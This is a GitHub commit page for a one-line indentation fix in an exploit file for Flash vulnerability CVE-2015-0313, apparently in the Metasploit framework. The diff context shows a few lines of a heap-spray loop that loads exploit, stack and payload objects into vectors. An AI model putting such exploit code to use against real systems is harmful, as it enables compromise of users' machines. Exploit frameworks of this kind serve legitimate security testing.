Skip to content

Commit 0d2454d

Browse files
committed
Fix indentation
1 parent 7fba64e commit 0d2454d

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

external/source/exploits/CVE-2015-0313/Exploiter.as

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -55,7 +55,7 @@ package
5555
for (var i:uint = 0; i < spray.length; i++)
5656
{
5757
spray[i] = new Vector.<Object>(VECTOR_OBJECTS_LENGTH)
58-
spray[i][0] = eba.ba
58+
spray[i][0] = eba.ba
5959
spray[i][1] = exploit
6060
spray[i][2] = stack
6161
spray[i][3] = payload_space

0 commit comments

Comments
 (0)